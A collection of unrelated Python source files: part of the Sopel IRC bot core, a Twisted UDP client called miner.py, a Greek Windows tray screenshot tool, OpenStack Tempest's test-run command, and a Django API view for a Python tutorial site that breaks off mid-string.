"""Called when a job from the Job Scheduler fails.
:param scheduler: the JobScheduler responsible for the errored ``job``
:type scheduler: :class:`sopel.tools.jobs.JobScheduler`
:param job: the Job that errored
:type job: :class:`sopel.tools.jobs.Job`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error.
:param trigger: the ``Trigger``\\ing line (if available)
:type trigger: :class:`sopel.trigger.Trigger`
:param Exception exception: the exception raised by the error (if
available)
"""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.now()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
"""Internal bot shutdown method."""
# Stop Job Scheduler
LOGGER.info('Stopping the Job Scheduler.')
self.scheduler.stop()
try:
self.scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception('Unable to stop the Job Scheduler.')
else:
LOGGER.info('Job Scheduler stopped.')
self.scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
'Calling shutdown for %d plugins.', len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
'Calling %s.%s',
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception('Error calling shutdown method: %s', e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.module.url`.
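        An illustrative sketch of the recommended decorator-based approach
        (the exact callback signature may differ between Sopel versions)::
            from sopel import module
            @module.url(r'http://example.com/path/.*')
            def handle_example(bot, trigger, match):
                bot.say(match.group(0))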
"""
if 'url_callbacks' not in self.memory:
self.memory['url_callbacks'] = tools.SopelMemory()
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern, callback):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to remove
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.module.url`.
"""
if 'url_callbacks' not in self.memory:
# nothing to unregister
return
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
try:
del self.memory['url_callbacks'][pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks whose regex pattern matches the ``url``.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
if 'url_callbacks' not in self.memory:
# nothing to search
return
for regex, function in tools.iteritems(self.memory['url_callbacks']):
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot.
:param str message: QUIT message to send (e.g. "Be right back!")
"""
self.wantsrestart = True
self.quit(message)
class SopelWrapper(object):
"""Wrapper around a Sopel instance and a Trigger.
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`~sopel.trigger.Trigger`
:param str output_prefix: prefix for messages sent through this wrapper
(e.g. plugin tag)
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>`
to the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger, output_prefix=''):
if not output_prefix:
# Just in case someone passes in False, None, etc.
output_prefix = ''
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
object.__setattr__(self, '_out_pfx', output_prefix)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
"""Override ``Sopel.say`` to use trigger source by default.
:param str message: message to say
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param int max_messages: split ``text`` into at most this many messages
if it is too long to fit in one (optional)
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.say`
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(self._out_pfx + message, destination, max_messages)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to use trigger source by default.
:param str message: action message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to use trigger source by default.
:param str message: notice message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(self._out_pfx + message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to ``reply_to`` sender by default.
:param str message: reply message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param str reply_to: person to reply to; defaults to
:attr:`trigger.nick <sopel.trigger.Trigger.nick>`
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
|
miner.py
|
import gettext
import time
import multiprocessing
from Tkinter import Tk
import tkMessageBox
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor, threads
import sys
from miner_ui import cumulative_logger
from miner_ui.main_window_app import MainWindowApp
from handlers.senz_handler import *
from config.config import *
_ = gettext.gettext
logging.basicConfig()  # comment this out to stop the console logger printing
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
if not (os.path.exists('logs')):
os.mkdir('logs')
filehandler = logging.FileHandler('logs/miner.log')
filehandler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
filehandler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(filehandler)
class SenzcProtocol(DatagramProtocol):
"""
    Protocol that connects to the UDP port which the server runs on. When a
    packet (senz) comes to the server we have to handle it asynchronously. We
    start a thread-safe twisted thread on GET, SHARE and PUT senz messages.
"""
def __init__(self, host, port):
"""
        Initialize the senz server host and port
Args:
host - server host
port - server port
"""
self.host = host
self.port = port
def startProtocol(self):
"""
        Called when the twisted UDP protocol starts. A few actions need to be
        done from here:
        1. First we need to connect to the UDP socket.
        2. Then we need to share the public key with the server via a SHARE senz.
        3. Finally we need to start a looping call to send ping messages to the
           server every 30 minutes.
"""
logger.info('client started')
self.transport.connect(self.host, self.port)
# share public key on start
self.share_pubkey()
def stopProtocol(self):
"""
        Called when the datagram protocol stops. Clear the global connection
        from here if it exists.
"""
reactor.callFromThread(reactor.stop)
logger.info('client protocol stopped')
root = Tk()
root.withdraw()
        tkMessageBox.showinfo("Message", "Switch not connected or not started, try again later")
root.quit()
#os._exit(0)
def datagramReceived(self, datagram, host):
"""
        Called when a datagram is received; datagrams are senz messages in our
        scenario. We have to handle the received senz from here. The senz
        handling part is delegated to SenzHandler.
        Args:
            datagram - senz message
            host - receiving host
"""
logger.info('datagram received %s' % datagram)
        # handle received datagram (senz)
self.handle_datagram(datagram)
def share_pubkey(self):
"""
        Send the public key of the senzy to the server via a SHARE senz. We
        have to digitally sign the senz before sending it to the server.
SHARE senz message would be like below
SHARE:
#pubkey <pubkey>
#time <time>
@mysensors
^<sender> <digital signature>
"""
# TODO get sender and receiver config
# send pubkey to server via SHARE senz
pubkey = get_pubkey()
receiver = servername
sender = clientname
senz = "SHARE #pubkey %s #time %s @%s ^%s" % (pubkey, time.time(), receiver, sender)
signed_senz = sign_senz(senz)
# print(signed_senz)
self.transport.write(signed_senz)
def handle_datagram(self, datagram):
"""
        Handle the received senz from here. We have to:
        1. Parse the datagram and obtain the senz
        2. Ignore ping messages from the server
        3. Handle GET, SHARE, PUT senz messages via SenzHandler
"""
#print datagram
if datagram == 'PING':
            # we ignore ping messages
            #logger.info('ping received')  # temporarily stop ping messages
pass
else:
# parse senz first
senz = parse(datagram)
# start threads for GET, PUT, DATA, SHARE senz
handler = SenzHandler(self.transport)
d = threads.deferToThread(handler.handleSenz, senz)
d.addCallback(handler.postHandle)
def init():
"""
    Init client certificates from here. All keys will be stored in the .keys/
    directory in the project root. We have to verify the content of that
    directory while initializing the keys.
"""
# init keys via crypto utils
init_keys()
def start():
"""
    Start the UDP senz protocol from here. It means connecting to the senz
    server. We have to provide the server host and port details from here
    (read from config).
"""
init()
# TODO get host and port from config
host = serverhost
port = serverport
    # start protocol
try:
protocol = SenzcProtocol(host, port)
reactor.listenUDP(0, protocol)
reactor.run(installSignalHandlers=False)
except KeyboardInterrupt:
#print "Unexpected Shut Down"
sys.exit()
if __name__ == '__main__':
global t, t1
t = multiprocessing.Process(target=start, args=())
t.start()
cl = cumulative_logger.CumulativeLogger()
logger.info(_('Starting the SCPP Miner-M1 Application..!'))
    # run the GUI in the main process; the senz protocol already runs in its
    # own process above (passing the result of run() as a Process target would
    # only start an empty child process)
    MainWindowApp(cl).run()
|
Simple PSv3.py
|
from win10toast import ToastNotifier
import PySimpleGUIQt as sg
import os
from datetime import datetime
import threading
import pyautogui as p
# ------------------------------MS imports for admin privileges start---------------------------------------------------
import ctypes
import enum
import sys
# ------------------------------MS imports for admin privileges end-----------------------------------------------------
class App():
def __init__(self):
self.tray_start()
def tray_start(self):
        self.thread1 = threading.Thread(target=self.notification, daemon=True)
        self.thread1.start()
        # keep the tray event loop in the calling thread so the app stays alive
        self.systray()
def screenShot(self):
home = os.environ.get('USERPROFILE')
dir = 'Simple Print Screen'
if os.path.isdir(home+'/'+dir) is not True:
path = os.path.join(home,dir)
os.mkdir(path)
now = datetime.now()
n = now.strftime("_%H-%M-%S_%B_%d_%Y")
p.screenshot(home+f'/Simple Print Screen/SimplePrintScreen{n}.png')
def systray(self):
menu_def = ['BLANK', ['&Άνοιγμα φακέλου', '&Πληροφορίες', '&Έξοδος']]
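        # menu items are in Greek: 'Άνοιγμα φακέλου' = 'Open folder',
        # 'Πληροφορίες' = 'Information', 'Έξοδος' = 'Exit'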
tray = sg.SystemTray(menu=menu_def, filename=r'icon.ico', tooltip='Κλικ για Simple Print Screen')
while True:
menu_item = tray.Read()
if menu_item == 'Έξοδος':
break
elif menu_item == 'Άνοιγμα φακέλου':
home = os.environ.get('USERPROFILE')
dir = 'Simple Print Screen'
if os.path.isdir(home + '/' + dir) is not True:
path = os.path.join(home, dir)
os.mkdir(path)
os.startfile(home+'/'+dir)
elif menu_item == '__ACTIVATED__':
self.screenShot()
self.notificationSave()
elif menu_item == 'Πληροφορίες':
sg.Popup(' Πληροφορίες', ' Simple Print Screen Έκδοση 3.2 \n\n Ευχαριστώ που χρησιμοποιείτε την εφαρμογή. \n Η εφαρμογή αναπτύχθηκε από τον \n Κωνσταντίνο Καρακασίδη. \n\n Επικοινωνία: defendergr@gmail.com \n', icon='icon.ico')
def notification(self):
toaster = ToastNotifier()
toaster.show_toast('Simple Print Screen', 'Από: \nΚωνσταντίνος Καρακασίδης', duration=3, icon_path='icon.ico')
def notificationSave(self):
toaster = ToastNotifier()
toaster.show_toast('Simple Print Screen', 'Το στιγμιότυπο οθόνης αποθηκεύτηκε', duration=2, icon_path='icon.ico')
# ------------------------------MS code for admin privileges start------------------------------------------------------
class SW(enum.IntEnum):
HIDE = 0
MAXIMIZE = 3
MINIMIZE = 6
RESTORE = 9
SHOW = 5
SHOWDEFAULT = 10
SHOWMAXIMIZED = 3
SHOWMINIMIZED = 2
SHOWMINNOACTIVE = 7
SHOWNA = 8
SHOWNOACTIVATE = 4
SHOWNORMAL = 1
class ERROR(enum.IntEnum):
ZERO = 0
FILE_NOT_FOUND = 2
PATH_NOT_FOUND = 3
BAD_FORMAT = 11
ACCESS_DENIED = 5
ASSOC_INCOMPLETE = 27
DDE_BUSY = 30
DDE_FAIL = 29
DDE_TIMEOUT = 28
DLL_NOT_FOUND = 32
NO_ASSOC = 31
OOM = 8
SHARE = 26
def bootstrap():
if ctypes.windll.shell32.IsUserAnAdmin():
App()
else:
hinstance = ctypes.windll.shell32.ShellExecuteW(
None, 'runas', sys.executable, sys.argv[0], None, SW.SHOWNORMAL
)
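        # ShellExecuteW returns a value greater than 32 on success; values
        # <= 32 are Win32 error codes (mapped by the ERROR enum above)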
if hinstance <= 32:
raise RuntimeError(ERROR(hinstance))
# ------------------------------MS code for admin privileges end--------------------------------------------------------
if __name__ == '__main__':
app = bootstrap()
|
run.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Runs tempest tests
This command is used for running the tempest tests
Test Selection
==============
Tempest run has several options:
* **--regex/-r**: This is a selection regex like what testr uses. It will run
any tests that match on re.match() with the regex
* **--smoke/-s**: Run all the tests tagged as smoke
There are also the **--blacklist-file** and **--whitelist-file** options that
let you pass a filepath to tempest run, with the file format being one regex
per line, and '#' used to signify the start of a comment on a line.
For example::
# Regex file
^regex1 # Match these tests
.*regex2 # Match those tests
The blacklist file will be used to construct a negative lookahead regex and
the whitelist file will simply OR all the regexes in the file. The whitelist
and blacklist file options are mutually exclusive so you can't use them
together. However, you can combine either with a normal regex or the *--smoke*
flag. When used with a blacklist file, the generated regex will be combined
into something like::
^((?!black_regex1|black_regex2).)*$cli_regex1
When combined with a whitelist file all the regexes from the file and the CLI
regexes will be ORed.
You can also use the **--list-tests** option in conjunction with selection
arguments to list which tests will be run.
Test Execution
==============
There are several options to control how the tests are executed. By default
tempest will run in parallel with a worker for each CPU present on the machine.
If you want to adjust the number of workers use the **--concurrency** option
and if you want to run tests serially, use **--serial/-t**.
Running with Workspaces
-----------------------
Tempest run enables you to run your tempest tests from any setup tempest
workspace. It relies on you having set up a tempest workspace with either the
``tempest init`` or ``tempest workspace`` commands. Then, using the
``--workspace`` CLI option, you can specify which one of your workspaces you
want to run tempest from. Using this option you don't have to run Tempest
directly with your current working directory being the workspace; Tempest will
take care of managing everything to be executed from there.
Running from Anywhere
---------------------
Tempest run provides you with an option to execute tempest from anywhere on
your system. You are required to provide a config file in this case with the
``--config-file`` option. When run, tempest will create a .testrepository
directory and a .testr.conf file in your current working directory. This way
you can use testr commands directly to inspect the state of the previous run.
Test Output
===========
By default tempest run's output to STDOUT will be generated using the
subunit-trace output filter. But, if you would prefer a subunit v2 stream be
output to STDOUT, use the **--subunit** flag.
Combining Runs
==============
There are certain situations in which you want to split a single run of tempest
across two executions of tempest run (for example, to run part of the tests
serially and others in parallel). To accomplish this but still treat the results
as a single run, you can leverage the **--combine** option, which will append
the current run's results to the previous run's.
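A few illustrative invocations (the workspace name and file paths below are
examples only)::
    tempest run --smoke --serial
    tempest run --regex '^tempest.api.compute' --concurrency 4
    tempest run --workspace my-cloud --blacklist-file ./skip-list.txt
    tempest run --config-file ./etc/tempest.conf --list-tests
    tempest run --combine --regex '^tempest.scenario'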
"""
import io
import os
import sys
import tempfile
import threading
from cliff import command
from os_testr import regex_builder
from os_testr import subunit_trace
from oslo_serialization import jsonutils as json
import six
from testrepository.commands import run_argv
from tempest import clients
from tempest.cmd import cleanup_service
from tempest.cmd import init
from tempest.cmd import workspace
from tempest.common import credentials_factory as credentials
from tempest import config
CONF = config.CONF
SAVED_STATE_JSON = "saved_state.json"
class TempestRun(command.Command):
def _set_env(self, config_file=None):
if config_file:
CONF.set_config_path(os.path.abspath(config_file))
# NOTE(mtreinish): This is needed so that testr doesn't gobble up any
# stacktraces on failure.
if 'TESTR_PDB' in os.environ:
return
else:
os.environ["TESTR_PDB"] = ""
# NOTE(dims): most of our .testr.conf try to test for PYTHON
# environment variable and fall back to "python", under python3
# if it does not exist. we should set it to the python3 executable
# to deal with this situation better for now.
if six.PY3 and 'PYTHON' not in os.environ:
os.environ['PYTHON'] = sys.executable
def _create_testrepository(self):
if not os.path.isdir('.testrepository'):
returncode = run_argv(['testr', 'init'], sys.stdin, sys.stdout,
sys.stderr)
if returncode:
sys.exit(returncode)
def _create_testr_conf(self):
top_level_path = os.path.dirname(os.path.dirname(__file__))
discover_path = os.path.join(top_level_path, 'test_discover')
file_contents = init.TESTR_CONF % (top_level_path, discover_path)
with open('.testr.conf', 'w+') as testr_conf_file:
testr_conf_file.write(file_contents)
def take_action(self, parsed_args):
returncode = 0
if parsed_args.config_file:
self._set_env(parsed_args.config_file)
else:
self._set_env()
# Workspace execution mode
if parsed_args.workspace:
workspace_mgr = workspace.WorkspaceManager(
parsed_args.workspace_path)
path = workspace_mgr.get_workspace(parsed_args.workspace)
if not path:
sys.exit(
"The %r workspace isn't registered in "
"%r. Use 'tempest init' to "
"register the workspace." %
(parsed_args.workspace, workspace_mgr.path))
os.chdir(path)
# NOTE(mtreinish): tempest init should create a .testrepository dir
# but since workspaces can be imported let's sanity check and
# ensure that one is created
self._create_testrepository()
# Local execution mode
elif os.path.isfile('.testr.conf'):
# If you're running in local execution mode and there is not a
# testrepository dir create one
self._create_testrepository()
# local execution with config file mode
elif parsed_args.config_file:
self._create_testr_conf()
self._create_testrepository()
else:
print("No .testr.conf file was found for local execution")
sys.exit(2)
if parsed_args.state:
self._init_state()
else:
pass
if parsed_args.combine:
temp_stream = tempfile.NamedTemporaryFile()
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
regex = self._build_regex(parsed_args)
if parsed_args.list_tests:
argv = ['tempest', 'list-tests', regex]
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
options = self._build_options(parsed_args)
returncode = self._run(regex, options)
if returncode > 0:
sys.exit(returncode)
if parsed_args.combine:
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
returncode = run_argv(['tempest', 'load', temp_stream.name],
sys.stdin, sys.stdout, sys.stderr)
sys.exit(returncode)
def get_description(self):
return 'Run tempest'
def _init_state(self):
print("Initializing saved state.")
data = {}
self.global_services = cleanup_service.get_global_cleanup_services()
self.admin_mgr = clients.Manager(
credentials.get_configured_admin_credentials())
admin_mgr = self.admin_mgr
kwargs = {'data': data,
'is_dry_run': False,
'saved_state_json': data,
'is_preserve': False,
'is_save_state': True}
for service in self.global_services:
svc = service(admin_mgr, **kwargs)
svc.run()
with open(SAVED_STATE_JSON, 'w+') as f:
f.write(json.dumps(data,
sort_keys=True, indent=2, separators=(',', ': ')))
def get_parser(self, prog_name):
parser = super(TempestRun, self).get_parser(prog_name)
parser = self._add_args(parser)
return parser
def _add_args(self, parser):
# workspace args
parser.add_argument('--workspace', default=None,
help='Name of tempest workspace to use for running'
' tests. You can see a list of workspaces '
'with tempest workspace list')
parser.add_argument('--workspace-path', default=None,
dest='workspace_path',
help="The path to the workspace file, the default "
"is ~/.tempest/workspace.yaml")
# Configuration flags
parser.add_argument('--config-file', default=None, dest='config_file',
help='Configuration file to run tempest with')
# test selection args
regex = parser.add_mutually_exclusive_group()
regex.add_argument('--smoke', '-s', action='store_true',
help="Run the smoke tests only")
regex.add_argument('--regex', '-r', default='',
help='A normal testr selection regex used to '
'specify a subset of tests to run')
list_selector = parser.add_mutually_exclusive_group()
list_selector.add_argument('--whitelist-file', '--whitelist_file',
help="Path to a whitelist file, this file "
"contains a separate regex on each "
"newline.")
list_selector.add_argument('--blacklist-file', '--blacklist_file',
help='Path to a blacklist file, this file '
'contains a separate regex exclude on '
'each newline')
# list only args
parser.add_argument('--list-tests', '-l', action='store_true',
help='List tests',
default=False)
# execution args
parser.add_argument('--concurrency', '-w',
help="The number of workers to use, defaults to "
"the number of cpus")
parallel = parser.add_mutually_exclusive_group()
parallel.add_argument('--parallel', dest='parallel',
action='store_true',
help='Run tests in parallel (this is the'
' default)')
parallel.add_argument('--serial', '-t', dest='parallel',
action='store_false',
help='Run tests serially')
parser.add_argument('--save-state', dest='state',
action='store_true',
help="To save the state of the cloud before "
"running tempest.")
# output args
parser.add_argument("--subunit", action='store_true',
help='Enable subunit v2 output')
parser.add_argument("--combine", action='store_true',
help='Combine the output of this run with the '
"previous run's as a combined stream in the "
"testr repository after it finish")
parser.set_defaults(parallel=True)
return parser
def _build_regex(self, parsed_args):
regex = ''
if parsed_args.smoke:
regex = 'smoke'
elif parsed_args.regex:
regex = parsed_args.regex
if parsed_args.whitelist_file or parsed_args.blacklist_file:
regex = regex_builder.construct_regex(parsed_args.blacklist_file,
parsed_args.whitelist_file,
regex, False)
return regex
def _build_options(self, parsed_args):
options = []
if parsed_args.subunit:
options.append("--subunit")
if parsed_args.parallel:
options.append("--parallel")
if parsed_args.concurrency:
options.append("--concurrency=%s" % parsed_args.concurrency)
return options
def _run(self, regex, options):
returncode = 0
argv = ['tempest', 'run', regex] + options
if '--subunit' in options:
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
argv.append('--subunit')
stdin = io.StringIO()
stdout_r, stdout_w = os.pipe()
subunit_w = os.fdopen(stdout_w, 'wt')
subunit_r = os.fdopen(stdout_r)
returncodes = {}
def run_argv_thread():
returncodes['testr'] = run_argv(argv, stdin, subunit_w,
sys.stderr)
subunit_w.close()
run_thread = threading.Thread(target=run_argv_thread)
run_thread.start()
returncodes['subunit-trace'] = subunit_trace.trace(
subunit_r, sys.stdout, post_fails=True, print_failures=True)
run_thread.join()
subunit_r.close()
# python version of pipefail
if returncodes['testr']:
returncode = returncodes['testr']
elif returncodes['subunit-trace']:
returncode = returncodes['subunit-trace']
return returncode
|
views.py
|
import json
import logging
import traceback
from datetime import datetime
from pathlib import Path
from threading import Thread
from time import sleep
from typing import get_type_hints
from uuid import uuid4
import birdseye.server
import requests
from birdseye import eye
from django.conf import settings
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.forms import ModelForm
from django.http import HttpResponse, JsonResponse
from django.views import View
from django.views.generic import CreateView
from django_user_agents.utils import get_user_agent
from littleutils import select_attrs, only
from sentry_sdk import capture_exception
from main.models import CodeEntry, ListEmail, User
from main.text import page_slugs_list, pages
from main.utils import highlighted_markdown
from main.utils.django import PlaceHolderForm
from main.workers.master import worker_result
log = logging.getLogger(__name__)
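# api_view dispatches a POSTed JSON body to the API method named in the URL:
# it decodes the body, loosely checks argument types against the method's
# type hints (logging a warning on mismatch), and wraps any exception into an
# error payload instead of letting it propagate.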
def api_view(request, method_name):
try:
method = getattr(API(request), method_name)
body = request.body
body = body.decode('utf8')
args = json.loads(body)
for arg_name, hint in get_type_hints(method).items():
if arg_name == 'return':
continue
arg = args[arg_name]
if not isinstance(arg, hint):
log.warning(
'Incorrect type for argument %s = %r of method %s: found %s, expected %s',
arg_name, arg, method_name, arg.__class__.__name__, hint.__name__)
result = method(**args)
if not isinstance(result, dict):
result = {'result': result}
except Exception:
capture_exception()
result = dict(
error=dict(
traceback=traceback.format_exc(),
)
)
return JsonResponse(result)
class API:
def __init__(self, request):
self.request = request
@property
def user(self) -> User:
return self.request.user
def run_code(self, code, source, page_index, step_index):
page_slug = page_slugs_list[page_index]
page = pages[page_slug]
step_name = pages[page_slug].step_names[step_index]
step = getattr(page, step_name)
entry_dict = dict(
input=code,
source=source,
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
entry = None
if settings.SAVE_CODE_ENTRIES:
entry = CodeEntry.objects.create(**entry_dict)
result = worker_result(entry_dict)
if settings.SAVE_CODE_ENTRIES:
entry.output = result["output"]
entry.save()
if result["error"]:
return dict(error=result["error"])
if passed := result["passed"]:
self.move_step(page_index, step_index + 1)
output_parts = result["output_parts"]
if not result["awaiting_input"]:
output_parts.append(dict(text=">>> ", color="white"))
birdseye_url = None
birdseye_objects = result["birdseye_objects"]
if birdseye_objects:
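            # The worker returns serialized birdseye functions and calls.
            # Re-insert them into the local birdseye database and remap the
            # old ids to the newly assigned ones so the top-level call can be
            # linked to a /birdseye/call/<id> URL.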
functions = birdseye_objects["functions"]
top_old_function_id = only(
f["id"]
for f in functions
if f["name"] == "<module>"
)
function_ids = [d.pop('id') for d in functions]
functions = [eye.db.Function(**{**d, 'hash': uuid4().hex}) for d in functions]
with eye.db.session_scope() as session:
for func in functions:
session.add(func)
session.commit()
function_ids = {old: func.id for old, func in zip(function_ids, functions)}
call_id = None
for call in birdseye_objects["calls"]:
old_function_id = call["function_id"]
is_top_call = old_function_id == top_old_function_id
call["function_id"] = function_ids[old_function_id]
call["start_time"] = datetime.fromisoformat(call["start_time"])
call = eye.db.Call(**call)
session.add(call)
if is_top_call:
call_id = call.id
birdseye_url = f"/birdseye/call/{call_id}"
return dict(
result=output_parts,
messages=list(map(highlighted_markdown, result["messages"])),
state=self.current_state(),
birdseye_url=birdseye_url,
passed=passed,
prediction=dict(
choices=getattr(step, "predicted_output_choices", None),
answer=getattr(step, "correct_output", None),
) if passed else dict(choices=None, answer=None),
)
def load_data(self):
user = self.user
if user.is_anonymous:
return {}
Thread(target=self.warmup_user_process).start()
return dict(
pages=[
dict(**select_attrs(page, "slug title index"), steps=page.step_dicts)
for page in pages.values()
],
state=self.current_state(),
user=dict(
email=user.email,
developerMode=user.developer_mode,
),
page_index=pages[self.user.page_slug].index,
)
def warmup_user_process(self):
page_slug = page_slugs_list[0]
step_name = pages[page_slug].step_names[0]
entry_dict = dict(
input="'dummy startup code'",
source="shell",
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
worker_result(entry_dict)
def set_developer_mode(self, value: bool):
self.user.developer_mode = value
self.user.save()
def current_state(self):
pages_progress = self.user.pages_progress
return dict(
pages_progress=[
page.step_names.index(pages_progress[page_slug]["step_name"])
for page_slug, page in pages.items()
],
)
def move_step(self, page_index, step_index: int):
page_slug = page_slugs_list[page_index]
step_names = pages[page_slug].step_names
if 0 <= step_index < len(step_names):
new_step_name = step_names[step_index]
self.user.pages_progress[page_slug]["step_name"] = new_step_name
self.user.save()
return self.current_state()
def set_page(self, index):
self.user.page_slug = page_slugs_list[index]
self.user.save()
def get_solution(self, page_index, step_index: int):
# TODO deprecated
page = pages[page_slugs_list[page_index]]
step = getattr(page, page.step_names[step_index])
return step.get_solution
def submit_feedback(self, title, description, state):
"""Create an issue on github.com using the given parameters."""
body = f"""
